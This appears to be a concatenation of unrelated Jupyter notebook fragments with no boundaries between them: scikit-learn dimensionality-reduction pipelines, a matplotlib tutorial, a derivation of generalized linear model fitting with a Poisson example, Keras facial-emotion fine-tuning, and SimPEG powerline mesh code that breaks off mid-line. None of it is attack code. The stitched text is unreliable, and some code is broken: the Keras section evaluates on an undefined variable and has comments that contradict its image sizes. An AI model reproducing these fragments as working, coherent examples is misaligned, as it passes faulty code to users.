print(DR_pipeline_accuracy_calculator(lin_svc_LLE_pipeline)) lin_svc_Isomap_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), Isomap()) print(DR_pipeline_accuracy_calculator(lin_svc_Isomap_pipeline)) lin_svc_LDA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(lin_svc_LDA_pipeline)) # rnd clf rnd_clf_PCA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), PCA()) print(DR_pipeline_accuracy_calculator(rnd_clf_PCA_pipeline)) rnd_clf_KernelPCA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), KernelPCA()) print(DR_pipeline_accuracy_calculator(rnd_clf_KernelPCA_pipeline)) rnd_clf_LLE_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(rnd_clf_LLE_pipeline)) rnd_clf_Isomap_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), Isomap()) print(DR_pipeline_accuracy_calculator(rnd_clf_Isomap_pipeline)) rnd_clf_LDA_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(rnd_clf_LDA_pipeline)) # extra trees extra_trees_clf_PCA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), PCA()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_PCA_pipeline)) extra_trees_clf_KernelPCA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), KernelPCA()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_KernelPCA_pipeline)) extra_trees_clf_LLE_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_LLE_pipeline)) extra_trees_clf_Isomap_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), Isomap()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_Isomap_pipeline)) extra_trees_clf_LDA_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_LDA_pipeline))0.9625+ **searchCV for DR Pipelines** ~~lin_svc_BIRCH_pipeline 96.25 ~~~~log_reg_PCA_pipeline 97.5~~~~log_reg_KernelPCA_pipeline~~ 97.5log_reg_LDA_pipeline 96.25lin_svc_PCA_pipeline 98.75~~lin_svc_KernelPCA_pipeline~~ 98.75rnd_clf_LDA_pipeline 97.5 extra_trees_clf_PCA_pipeline 97.5~~extra_trees_clf_KernelPCA_pipeline~~ 97.5extra_trees_clf_LDA_pipeline 96.25lin_svc_BIRCH_pipeline.named_steps["DR_algo"] # lin_svc_BIRCH_pipeline 96.25 run_lin_svc_BIRCH_pipeline = False if run_lin_svc_BIRCH_pipeline: param_grid_lin_svc_BIRCH_pipeline = [ {"DR_algo__threshold": [0.5, 1, 10, 15], "DR_algo__branching_factor": [50, 75, 100], "DR_algo__n_clusters": [3, 10, 15, 30] } ] grid_cv_lin_svc_BIRCH_pipeline = GridSearchCV(lin_svc_BIRCH_pipeline, param_grid_lin_svc_BIRCH_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc_BIRCH_pipeline.fit(X_train, y_train) # grid_cv_lin_svc_BIRCH_pipeline.best_score_ 0.9357142857142857 # log_reg_PCA_pipeline 97.5 run_log_reg_PCA_pipeline = False if run_log_reg_PCA_pipeline: param_grid_log_reg_PCA_pipeline = [ {"DR_algo__n_components": [0.90, 0.95, 1.0] } ] grid_cv_log_reg_PCA_pipeline = GridSearchCV(log_reg_PCA_pipeline, param_grid_log_reg_PCA_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg_PCA_pipeline.fit(X_train, y_train) # grid_cv_log_reg_PCA_pipeline.best_score_ 0.9428571428571428 param_kPCA = [ {"DR_algo__n_components": [0.90, 0.95, 1.0], "DR_algo__kernel": ["linear", "poly", "rbf", "sigmoid"], "DR_algo__degree": [3, 6, 9, 12] } ] kPCA_scores = [] def run_searchCV(param_grid): for pipeline in (log_reg_KernelPCA_pipeline, lin_svc_KernelPCA_pipeline, extra_trees_clf_KernelPCA_pipeline): searchcv = GridSearchCV(pipeline, param_kPCA, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) searchcv.fit(X_train, y_train) kPCA_scores.append(searchcv.best_score_) # run_searchCV(param_kPCA) # kPCA_scores [0.10714285714285714, 0.09642857142857142, 0.19285714285714284] param_grid_log_reg_PCA_pipeline = [ {"DR_algo__n_components": [0.90, 0.95, 1.0] } ] PCA_scores = [] def run_PCA_searchCV(): for pipeline in (lin_svc_PCA_pipeline, extra_trees_clf_PCA_pipeline): searchcv = GridSearchCV(pipeline, param_grid_log_reg_PCA_pipeline, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) searchcv.fit(X_train, y_train) PCA_scores.append(searchcv.best_score_) # run_PCA_searchCV() # PCA_scores [0.95, 0.9285714285714285] lin_svc_PCA_pipeline_pred = lin_svc_PCA_pipeline.predict(X_test) print(accuracy_score(y_test, lin_svc_PCA_pipeline_pred)) lin_svc_KernelPCA_pipeline_pred = lin_svc_KernelPCA_pipeline.predict(X_test) print(accuracy_score(y_test, lin_svc_KernelPCA_pipeline_pred))0.975These notebooks can be found at https://github.com/jaspajjr/pydata-visualisation if you want to follow along https://matplotlib.org/users/intro.htmlMatplotlib is a library for making 2D plots of arrays in Python.* Has it's origins in emulating MATLAB, it can also be used in a Pythonic, object oriented way. * Easy stuff should be easy, difficult stuff should be possibleimport matplotlib.pyplot as plt import numpy as np import pandas as pd %matplotlib inlineEverything in matplotlib is organized in a hierarchy. At the top of the hierarchy is the matplotlib “state-machine environment” which is provided by the matplotlib.pyplot module. At this level, simple functions are used to add plot elements (lines, images, text, etc.) to the current axes in the current figure.Pyplot’s state-machine environment behaves similarly to MATLAB and should be most familiar to users with MATLAB experience.The next level down in the hierarchy is the first level of the object-oriented interface, in which pyplot is used only for a few functions such as figure creation, and the user explicitly creates and keeps track of the figure and axes objects. At this level, the user uses pyplot to create figures, and through those figures, one or more axes objects can be created. These axes objects are then used for most plotting actions. Scatter Plot To start with let's do a really basic scatter plot:plt.plot([0, 1, 2, 3, 4, 5], [0, 2, 4, 6, 8, 10]) x = [0, 1, 2, 3, 4, 5] y = [0, 2, 4, 6, 8, 10] plt.plot(x, y)What if we don't want a line?plt.plot([0, 1, 2, 3, 4, 5], [0, 2, 5, 7, 8, 10], marker='o', linestyle='') plt.xlabel('The X Axis') plt.ylabel('The Y Axis') plt.show();Simple example from matplotlibhttps://matplotlib.org/tutorials/intermediate/tight_layout_guide.htmlsphx-glr-tutorials-intermediate-tight-layout-guide-pydef example_plot(ax, fontsize=12): ax.plot([1, 2]) ax.locator_params(nbins=5) ax.set_xlabel('x-label', fontsize=fontsize) ax.set_ylabel('y-label', fontsize=fontsize) ax.set_title('Title', fontsize=fontsize) fig, ax = plt.subplots() example_plot(ax, fontsize=24) fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2) # fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, sharex=True, sharey=True) ax1.plot([0, 1, 2, 3, 4, 5], [0, 2, 5, 7, 8, 10]) ax2.plot([0, 1, 2, 3, 4, 5], [0, 2, 4, 9, 16, 25]) ax3.plot([0, 1, 2, 3, 4, 5], [0, 13, 18, 21, 23, 25]) ax4.plot([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]) plt.tight_layout()Date Plottingimport pandas_datareader as pdr df = pdr.get_data_fred('GS10') df = df.reset_index() print(df.info()) df.head() fig = plt.figure(figsize=(12, 8)) ax = fig.add_subplot(111) ax.plot_date(df['DATE'], df['GS10'])Bar Plotfig = plt.figure(figsize=(12, 8)) ax = fig.add_subplot(111) x_data = [0, 1, 2, 3, 4] values = [20, 35, 30, 35, 27] ax.bar(x_data, values) ax.set_xticks(x_data) ax.set_xticklabels(('A', 'B', 'C', 'D', 'E')) ;Matplotlib basicshttp://pbpython.com/effective-matplotlib.html Behind the scenes* matplotlib.backend_bases.FigureCanvas is the area onto which the figure is drawn * matplotlib.backend_bases.Renderer is the object which knows how to draw on the FigureCanvas * matplotlib.artist.Artist is the object that knows how to use a renderer to paint onto the canvas The typical user will spend 95% of their time working with the Artists.https://matplotlib.org/tutorials/intermediate/artists.htmlsphx-glr-tutorials-intermediate-artists-pyfig, (ax1, ax2) = plt.subplots( nrows=1, ncols=2, sharey=True, figsize=(12, 8)) fig.suptitle("Main Title", fontsize=14, fontweight='bold'); x_data = [0, 1, 2, 3, 4] values = [20, 35, 30, 35, 27] ax1.barh(x_data, values); ax1.set_xlim([0, 55]) #ax1.set(xlabel='Unit of measurement', ylabel='Groups') ax1.set(title='Foo', xlabel='Unit of measurement') ax1.grid() ax2.barh(x_data, [y / np.sum(values) for y in values], color='r'); ax2.set_title('Transformed', fontweight='light') ax2.axvline(x=.1, color='k', linestyle='--') ax2.set(xlabel='Unit of measurement') # Worth noticing this ax2.set_axis_off(); fig.savefig('example_plot.png', dpi=80, bbox_inches="tight")Logistic regression is one example of a wider class of Generalized LinearModels (GLMs). These GLMs have the following three key features* A target $Y$ variable distributed according to one of the exponential family of distributions (e.g., Normal, binomial, Poisson)* An equation that links the expected value of $Y$ with a linear combination of the observed variables (i.e., $\left\{ x_1,x_2,\ldots,x_n \right\}$). * A smooth invertible *link* function $g(x)$ such that $g(\mathbb{E}(Y)) = \sum_k \beta_k x_k$ Exponential FamilyHere is the one-parameter exponential family, $$f(y;\lambda) = e^{\lambda y - \gamma(\lambda)}$$ The *natural parameter* is $\lambda$ and $y$ is the sufficientstatistic. For example, for logistic regression, we have$\gamma(\lambda)=-\log(1+e^{\lambda})$ and $\lambda=\log{\frac{p}{1-p}}$. An important property of this exponential family is that $$\begin{equation}\mathbb{E}_{\lambda}(y) = \frac{d\gamma(\lambda)}{d\lambda}=\gamma'(\lambda)\end{equation}\label{eq:dgamma} \tag{1}$$ To see this, we compute the following, $$\begin{align*}1 &= \int f(y;\lambda) dy = \int e^{\lambda y - \gamma(\lambda)} dy \\0 &= \int \frac{df(y;\lambda)}{d\lambda} dy =\int e^{\lambda y-\gamma (\lambda)} \left(y-\gamma'(\lambda)\right) dy \\\int y e^{\lambda y-\gamma (\lambda )} dy &= \mathbb{E}_{\lambda}(y)=\gamma'(\lambda ) \end{align*}$$ Using the same technique, we also have, $$\mathbb{V}_{\lambda}(Y) = \gamma''(\lambda)$$ which explains the usefulness of this generalized notation for theexponential family. DevianceThe scaled Kullback-Leibler divergence is called the *deviance* asdefined below, $$D(f_1,f_2) = 2 \int f_1(y) \log{\frac{f_1(y)}{f_2(y)}}dy$$ **Hoeffding's Lemma.**Using our exponential family notation, we can write out the deviance asthe following, $$\begin{align*}\frac{1}{2} D(f(y;\lambda_1), f(y;\lambda_2)) & = \int f(y;\lambda_1)\log \frac{f(y;\lambda_1)}{f(y;\lambda_2)} dy \\ & = \int f(y;\lambda_1) ((\lambda_1-\lambda_2) y -(\gamma(\lambda_1)-\gamma(\lambda_2))) dy \\ & = \mathbb{E}_{\lambda_1} [ (\lambda_1-\lambda_2) y -(\gamma(\lambda_1)-\gamma(\lambda_2)) ] \\ & = (\lambda_1-\lambda_2) \mathbb{E}_{\lambda_1}(y) -(\gamma(\lambda_1)-\gamma(\lambda_2)) \\ & = (\lambda_1-\lambda_2) \mu_1 -(\gamma(\lambda_1)-\gamma(\lambda_2)) \end{align*}$$ where $\mu_1:=\mathbb{E}_{\lambda_1}(y)$. For the maximum likelihoodestimate $\hat{\lambda}_1$, we have $\mu_1=y$. Plugging thisinto the above equation gives the following, $$\begin{align*}\frac{1}{2} D(f(y;\hat{\lambda}_1),f(y;\lambda_2))&=(\hat{\lambda}_1-\lambda_2) y -(\gamma(\hat{\lambda}_1)-\gamma(\lambda_2)) \\&= \log{f(y;\hat{\lambda}_1)} - \log{f(y;\lambda_2)} \\&= \log\frac{f(y;\hat{\lambda}_1)}{f(y;\lambda_2)}\end{align*}$$ Taking the negative exponential of both sides gives, $$f(y;\lambda_2) = f(y;\hat{\lambda}_1) e^{-\frac{1}{2} D(f(y;\hat{\lambda}_1),f(y;\lambda_2)) }$$ Because $D$ is always non-negative, the likelihoodis maximized when the the deviance is zero. In particular,for the scalar case, it means that $y$ itself is thebest maximum likelihood estimate for the mean. Also,$f(y;\hat{\lambda}_1)$ is called the *saturated* model.We write Hoeffding's Lemma as the following, $$\begin{equation}f(y;\mu) = f(y;y)e^{-\frac{1}{2} D(f(y;y),f(y;\mu))} \end{equation}\label{eq:lemma} \tag{2}$$ to emphasize that $f(y;y)$ is the likelihood function when the mean is replaced by the sample itself and $f(y;\mu)$ is the likelihood function when the mean is replaced by $\mu$.Vectorizing Equation ([2](eq:lemma)) using mutual independence gives thefollowing, $$f(\mathbf{y};\boldsymbol{\mu}) = e^{-\sum_i D(y_i,\mu_i)} \prod f(y_i;y_i)$$ The idea now is to minimize the deviance by deriving, $$\boldsymbol{\mu}(\boldsymbol{\beta}) = g^{-1}(\mathbf{M}^T\boldsymbol{\beta})$$ This means the the MLE $\hat{\boldsymbol{\beta}}$ is thebest $p\times 1$ vector $\boldsymbol{\beta}$ that minimizes thetotal deviance where $g$ is the *link* function and $\mathbf{M}$ isthe $p\times n$ *structure* matrix. This is the key step with GLMestimation because it reduces the number of parameters from $n$ to$p$. The structure matrix is where the associated $x_i$ data entersinto the problem. Thus, GLM maximum likelihood fitting minimizes thetotal deviance like plain linear regression minimizes the sum ofsquares.With the following, $$\boldsymbol{\lambda} = \mathbf{M}^T \boldsymbol{\beta}$$ with $2\times n$ dimensional $\mathbf{M}$. The corresponding jointdensity function is the following, $$f(\mathbf{y};\beta)=e^{\boldsymbol{\beta}^T\boldsymbol{\xi}-\psi(\boldsymbol{\beta})} f_0(\mathbf{y})$$ where $$\boldsymbol{\xi} = \mathbf{M} \mathbf{y}$$ and $$\psi(\boldsymbol{\beta}) = \sum \gamma(\mathbf{m}_i^T \boldsymbol{\beta})$$ where now the sufficient statistic is $\boldsymbol{\xi}$ and theparameter vector is $\boldsymbol{\beta}$, which fits into our exponentialfamily format, and $\mathbf{m}_i$ is the $i^{th}$ column of $\mathbf{M}$. Given this joint density, we can compute the log likelihood as the following, $$\ell = \boldsymbol{\beta}^T\boldsymbol{\xi}-\psi(\boldsymbol{\beta})$$ To maximize this likelihood, we take the derivative of this withrespect to $\boldsymbol{\beta}$ to obtain the following, $$\frac{d\ell}{d\boldsymbol{\beta}}=\mathbf{M}\mathbf{y}-\mathbf{M}\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})$$ since $\gamma'(\mathbf{m}_i^T \boldsymbol{\beta}) =\mathbf{m}_i^T \mu_i(\boldsymbol{\beta})$ and (c.f. Equation ([1](eq:dgamma))), $\gamma' = \mu_{\lambda}$. Setting this derivative equal to zero gives the conditionsfor the maximum likelihood solution, $$\begin{equation}\mathbf{M}(\mathbf{y}- \boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})) = \mathbf{0}\end{equation}\label{eq:conditions} \tag{3}$$ where $\boldsymbol{\mu}$ is the element-wise inverse of the link function. This leads us to exactly the same place we started: trying to regress $\mathbf{y}$ against $\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta})$. ExampleThe structure matrix $\mathbf{M}$ is where the $x_i$ data associated with the corresponding $y_i$ enters the problem. If we choose $$\mathbf{M}^T = [\mathbf{1}, \mathbf{x}]$$ where $\mathbf{1}$ is an $n$-length vector and $$\boldsymbol{\beta} = [\beta_0, \beta_1]^T$$ with $\mu(x) = 1/(1+e^{-x})$, we have the original logistic regression problem.Generally, $\boldsymbol{\mu}(\boldsymbol{\beta})$ is a nonlinearfunction and thus we regress against our transformed variable $\mathbf{z}$ $$\mathbf{z} = \mathbf{M}^T\boldsymbol{\beta} + \diag(g'(\boldsymbol{\mu}))(\mathbf{y}-\boldsymbol{\mu}(\mathbf{M}^T\boldsymbol{\beta}))$$ This fits the format of the Gauss Markov(see [ch:stats:sec:gauss](ch:stats:sec:gauss)) problem and has the following solution, $$\begin{equation}\hat{\boldsymbol{\beta}}=(\mathbf{M} \mathbf{R}_z^{-1}\mathbf{M}^T)^{-1}\mathbf{M} \mathbf{R}_z^{-1}\mathbf{z}\end{equation}\label{eq:bhat} \tag{4}$$ where $$\mathbf{R}_z:=\mathbb{V}(\mathbf{z})=\diag(g'(\boldsymbol{\mu}))^2\mathbf{R}=\mathbf{v}(\mu)\diag(g'(\boldsymbol{\mu}))^2\mathbf{I}$$ where $g$ is the link function and $\mathbf{v}$ is the variancefunction on the designated distribution of the $y_i$.Thus, $\hat{\boldsymbol{\beta}}$ has the following covariance matrix, $$\mathbb{V}(\hat{\boldsymbol{\beta}}) = (\mathbf{M}\mathbf{R}_z^{-1}\mathbf{M}^T)^{-1}$$ These results allow inferences about the estimated parameters$\hat{\boldsymbol{\beta}}$. We can easily write Equation ([4](eq:bhat))as an iteration as follow, $$\hat{\boldsymbol{\beta}}_{k+1}=(\mathbf{M} \mathbf{R}_{z_k}^{-1}\mathbf{M}^T)^{-1}\mathbf{M} \mathbf{R}_{z_k}^{-1}\mathbf{z}_k$$ ExampleConsider the data shown in [Figure](fig:glm_003). Note that the variance ofthe data increases for each $x$ and the data increases as a power of $x$ along$x$. This makes this data a good candidate for a Poisson GLM with $g(\mu) =\log(\mu)$.%matplotlib inline from scipy.stats.distributions import poisson import statsmodels.api as sm from matplotlib.pylab import subplots import numpy as np def gen_data(n,ns=10): param = n**2 return poisson(param).rvs(ns) fig,ax=subplots() xi = [] yi = [] for i in [2,3,4,5,6]: xi.append([i]*10) yi.append(gen_data(i)) _=ax.plot(xi[-1],yi[-1],'ko',alpha=.3) _=ax.axis(xmin=1,xmax=7) xi = np.array(xi) yi = np.array(yi) x = xi.flatten() y = yi.flatten() _=ax.set_xlabel('x'); fig.savefig('fig-machine_learning/glm_003.png')-->Some data for Poisson example.We can use our iterative matrix-based approach. The following code initializes the iteration.M = np.c_[x*0+1,x].T gi = np.exp # inverse g link function bk = np.array([.9,0.5]) # initial point muk = gi(M.T @ bk).flatten() Rz = np.diag(1/muk) zk = M.T @ bk + Rz @ (y-muk)and this next block establishes the main iterationwhile abs(sum(M @ (y-muk))) > .01: # orthogonality condition as threshold Rzi = np.linalg.inv(Rz) bk = (np.linalg.inv(M @ Rzi @ M.T)) @ M @ Rzi @ zk muk = gi(M.T @ bk).flatten() Rz =np.diag(1/muk) zk = M.T @ bk + Rz @ (y-muk)with corresponding final $\boldsymbol{\beta}$ computed as the following,print(bk)[0.72758176 0.48763741]with corresponding estimated $\mathbb{V}(\hat{\boldsymbol{\beta}})$ asprint(np.linalg.inv(M @ Rzi @ M.T))[[ 0.01850392 -0.0035621 ] [-0.0035621 0.00072885]]The orthogonality condition Equation ([3](eq:conditions)) is the following,print(M @ (y-muk))[-4.90472131e-05 -2.62970365e-04]For comparison, the `statsmodels` module provides the Poisson GLM object.Note that the reported standard error is the square root of the diagonal elements of $\mathbb{V}(\hat{\boldsymbol{\beta}})$. A plot of the data and the fitted model is shown below in Figure ([fig:glm_004](fig:glm_004)).pm=sm.GLM(y, sm.tools.add_constant(x), family=sm.families.Poisson()) pm_results=pm.fit() pm_results.summary() b0,b1=pm_results.params fig,ax=subplots() _=ax.plot(xi[:,0],np.exp(xi[:,0]*b1+b0),'-o'); _=ax.plot(xi,yi,'ok',alpha=.3); fig.savefig('fig-machine_learning/glm_004.png') _=ax.set_xlabel('x');!pip install keras !pip install keras_vggface !pip install pandas !pip install scikit_image import numpy as np import pandas as pd import sys,os from skimage.transform import resize from keras import backend as K from keras.utils import to_categorical from keras_vggface.vggface import VGGFace from keras.models import Model from keras.layers import Flatten, Dense from keras.preprocessing.image import ImageDataGenerator from keras.optimizers import Adam from keras.callbacks import TensorBoard, LearningRateScheduler, ReduceLROnPlateau, EarlyStopping, Callback from keras import optimizers from google.colab import drive from keras.layers import Input from keras.layers import Input, Dense, Conv2D, BatchNormalization, RepeatVector, Multiply, Permute, Reshape,MaxPooling2D, Flatten, Dropout, InputLayer,Activation from keras.models import Sequential from keras.optimizers import Adam from keras import optimizers import keras from keras.regularizers import l2 folder = "/content/drive/Colab Notebooks/" img_height, img_width = 197, 197 # Declaration of Parameters num_classes = 7 epochs_top_layers = 5 epochs_all_layers = 50 batch_size = 128 input_shape=(img_height, img_width,3) from google.colab import drive drive.mount('/content/drive', force_remount=True) filepath = "/content/drive/My Drive/Colab Notebooks/" sys.path.insert(0, filepath) os.chdir(filepath) train_dir='train.csv' test_dir='test.csv' wdata = pd.read_csv(train_dir) data=wdata.iloc[1:1000,] ddt=wdata.iloc[1001:1300,] gd=pd.read_csv(test_dir) print(gd.size) test=gd.iloc[0:1794,] #for better accuracy train on more data base_model = VGGFace( model = 'resnet50', include_top = False, weights = 'vggface', input_shape = (img_height, img_width, 3)) base_model.summary() x = base_model.output x = Flatten()(x) x = Dense(1024, activation = 'relu')(x) predictions = Dense(num_classes, activation = 'softmax')(x) # The model to be trained model = Model(inputs = base_model.input, outputs = predictions) i = Input(shape=(197,197,3)) o1 = Conv2D(32, kernel_size=(3, 3), activation=None)(i) o2 = BatchNormalization()(o1) o3 = Conv2D(64, kernel_size=(3,3),activation=None)(o2) o4 = BatchNormalization()(o3) o1 = Conv2D(128,kernel_size=(3,3),activation=None)(o1) o4 = Activation('relu')(o4) o4 = Dropout(0.25)(o4) o5 = keras.layers.add([o1,o3,o4]) o5 = BatchNormalization()(o5) o5 = Activation('relu')(o5) attn = Dense(1, activation='tanh')(o5) attn = Flatten()(attn) attn = Activation('softmax')(attn) attn = RepeatVector(64)(attn) attn = Permute([2, 1])(attn) o5 = Reshape((193,64))(o5) o6 = Multiply()([o5, attn]) o6 = Flatten()(o6) o6 = Dense(12, activation=None)(o6) o6 = BatchNormalization()(o6) o6 = Activation('relu')(o6) o6 = Dropout(0.5)(o6) o6 = Dense(7,activation='softmax')(o6) model_finetunedd = Model(inputs=i,outputs=o6) print("model") model_finetuned = Sequential() model_finetuned.add(model) model_finetuned.add(Dense(32, activation='relu', input_dim=input_shape)) model_finetuned.add(Dropout(0.25)) model_finetuned.add(Dense(64, activation='relu')) model_finetuned.add(Dropout(0.5)) model_finetuned.add(Dense(7, activation='sigmoid')) model_finetuned.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-5), metrics=['accuracy']) model_finetuned.summary() def preprocess_input(x): x -= 128.8006 # np.mean(train_dataset) return x # Function to read the data from the csv file, increase the size of the images and return the images and their labels def get_data(data): pixels = data['pixels'].tolist() images = np.empty((len(data), 48,48, 3)) i = 0 for pixel_sequence in pixels: single_image = [float(pixel) for pixel in pixel_sequence.split(' ')] # Extraction of each single single_image = np.asarray(single_image).reshape(48, 48) # Dimension: 48x48 single_image = resize(single_image, (48,48), order = 3, mode = 'constant') # Dimension: 139x139x3 (Bicubic) ret = np.empty((48,48, 3)) ret[:, :, 0] = single_image ret[:, :, 1] = single_image ret[:, :, 2] = single_image images[i, :, :, :] = ret i += 1 images = preprocess_input(images) labels = to_categorical(data['emotion']) return images, labels # Data preparation train_data_x, train_data_y = get_data(data) val_data = get_data(ddt) train_datagen = ImageDataGenerator( rotation_range = 10, shear_range = 10, # 10 degrees zoom_range = 0.1, fill_mode = 'reflect', horizontal_flip = True) # Takes numpy data & label arrays, and generates batches of augmented/normalized data. Yields batcfillhes indefinitely, in an infinite loop # x: Data. Should have rank 4. In case of grayscale data, the channels axis should have value 1, and in case of RGB data, # it should have value 3 # y: Labels # batch_size: Int (default: 32) train_generator = train_datagen.flow( train_data_x, train_data_y, batch_size = batch_size) model_finetuned.compile( optimizer = Adam(lr = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-08, decay = 0.0), loss = 'categorical_crossentropy', metrics = ['accuracy']) model_finetuned.fit_generator( generator = train_generator, steps_per_epoch = len(train_data_x) // batch_size, # samples_per_epoch / batch_size epochs = 1, validation_data = val_data) #fine-tuning the model by unfreezing the convolution layers for layer in model.layers: layer.trainable = True from keras import optimizers model.compile( optimizer = optimizers.SGD(lr = 1e-4, momentum = 0.9, decay = 0.0, nesterov = True), loss = 'categorical_crossentropy', metrics = ['accuracy']) tensorboard_all_layers = TensorBoard( log_dir = folder + '/logs_all_layers', histogram_freq = 0, write_graph = True, write_grads = False, write_images = True) #save progress in drive def scheduler(epoch): updated_lr = K.get_value(model.optimizer.lr) * 0.5 if (epoch % 3 == 0) and (epoch != 0): K.set_value(model.optimizer.lr, updated_lr) print(K.get_value(model.optimizer.lr)) return K.get_value(model.optimizer.lr) # Learning rate scheduler # schedule: a function that takes an epoch index as input (integer, indexed from 0) and current learning #ate and returns a new learning rate as output (float) reduce_lr = LearningRateScheduler(scheduler) reduce_lr_plateau = ReduceLROnPlateau( monitor = 'val_loss', factor = 0.5, patience = 3, mode = 'auto', min_lr = 1e-8) # Stop training when a monitored quantity has stopped improving # monitor: Quantity to be monitored # patience: Number of epochs with no improvement after which training will be stopped # mode: One of {auto, min, max} early_stop = EarlyStopping( monitor = 'val_loss', patience = 10, mode = 'auto') model.fit_generator( generator = train_generator, steps_per_epoch = len(train_data_x) // batch_size, # samples_per_epoch / batch_size epochs = 1, validation_data = val_data, callbacks = [reduce_lr, reduce_lr_plateau, early_stop]) scores = model.evaluate(np.array(val_data), np.array(m), batch_size=batch_size) print("Loss: " + str(scores[0])) print("Accuracy: " + str(scores[1]))Powerline discretizationFigure 7 of the Kang et al. (2020) is generated using this notebook.from SimPEG import Mesh, Utils import numpy as np from simpegEM1D import diffusion_distance from pymatsolver import Pardiso from SimPEG import EM from scipy.constants import mu_0 from scipy.interpolate import interp1d from simpegEM1D.Waveforms import piecewise_pulse_fast from pyMKL import mkl_set_num_threads from simpegskytem.TDEM import ProblemSkyTEM from mesh_utils import refineTree, meshBuilder num_threads = 4 mkl_set_num_threads(num_threads) tmin, tmax = 1e-6, 1e-2 sigma_for_padding = 1./100. padding_distance = np.round(diffusion_distance(1e-2, sigma_for_padding) * 2) sigma_halfspace = 1./20. layer_thickness = 4 resistivity_near = 100. x = np.linspace(-250, 250) y = np.linspace(-250, 250) z = np.array([0.]) dem = Utils.ndgrid(x,y,z) result_dir = "./n_tower/" maxLevel = 11 h = [1, 1, 1] octreeLevel = [0, 1, 1, 1, 4, 4, 10] # n_towers = [2, 4, 6, 8, 10, 12, 14] ground_resistance = 20. n_tower = 2 padDist = np.ones((3, 2)) * padding_distance mesh = meshBuilder( dem, h, padDist, meshType='TREE', verticalAlignment='center' ) # Refine the mesh around topographyttb mesh = refineTree( mesh, dem, dtype='surface', octreeLevels=octreeLevel, finalize=False ) y = np.linspace(-40, 40) x = np.linspace(-10, 10) z = np.array([0.]) tmp = Utils.ndgrid(x,y,z) # Refine the mesh around topography mesh = refineTree(mesh, tmp, dtype='surface', octreeLevels=[0, 0, 0, 0, 0, 1], finalize=False) n_segment = int(n_tower) l_copper = 80. ys = np.arange(n_segment) * l_copper shift = -ys.max()/2. ys += shift x1 = 0. # z1, z2 = -h[0]*2., 10. z1, z2 = -3., 10. # z1, z2 = 0., 10. ys_corr = [] for y_temp in ys: ys_corr.append(mesh.vectorNy[np.argmin(abs(mesh.vectorNy-y_temp))]) ys = np.hstack(ys_corr) x1 = mesh.vectorNx[np.argmin(abs(mesh.vectorNx-x1))] z1 = mesh.vectorNz[np.argmin(abs(mesh.vectorNz-z1))] z2 = mesh.vectorNz[np.argmin(abs(mesh.vectorNz-z2))] pts_top = [] pts_bottom = [] for ii in range(n_segment-1): ind_y_top = np.logical_and(mesh.vectorNy>=ys[ii], mesh.vectorNy<=ys[ii+1]) ex = np.ones(ind_y_top.sum()) * x1 ez = np.ones(ind_y_top.sum()) * z2 pts_top.append(np.c_[ex, mesh.vectorNy[ind_y_top], ez]) ez = np.ones(ind_y_top.sum()) * z1 pts_bottom.append(np.c_[ex, mesh.vectorNy[ind_y_top], ez]) pts_tower = [] for ii in range(n_segment): ind_z_side = np.logical_and(mesh.vectorNz>=z1, mesh.vectorNz<=z2) ex = np.ones(ind_z_side.sum())*x1 ey = np.ones(ind_z_side.sum())*ys[ii] pts_tower.append(np.c_[ex, ey, mesh.vectorNz[ind_z_side]]) # pts = np.vstack((np.vstack(pts_top), np.vstack(pts_bottom), np.vstack(pts_tower))) pts = np.vstack((np.vstack(pts_top), np.vstack(pts_tower))) mesh = refineTree(mesh, pts, dtype='point', octreeLevels=[1, 0, 0], finalize=False) survey_length = 400. dx = 4 n_src = survey_length / dx x = np.arange(n_src) * dx x -= x.max()/2. y = np.array([abs(mesh.vectorCCy).min()]) z_src = 40. z = np.array([z_src]) xyz = Utils.ndgrid(x, y, z) mesh = refineTree(mesh, xyz, dtype='point', octreeLevels=[1, 0, 0], finalize=True, maxLevel=maxLevel) sigma = np.ones(mesh.nC) * 1./20 inds_air = mesh.gridCC[:, 2] > 0. sigma[mesh.gridCC[:, 2] > 0.] = 1e-8 indArr, levels = mesh.__getstate__() inds = levels == levels.max() temp = np.unique(levels) cell_size = 2**(temp.max()-temp) print (n_tower) radius_copper = 3.264 * 1e-3/2. area_copper = np.pi * radius_copper **2 radius_rod = 15.87 * 1e-3 / 2. area_rod = np.pi * radius_rod **2 sigma_copper = 6e7 sigma_rod = 1e8 area = (mesh.hx.min() * 4)**2 sigma[np.logical_and(inds, inds_air)] = sigma_copper * 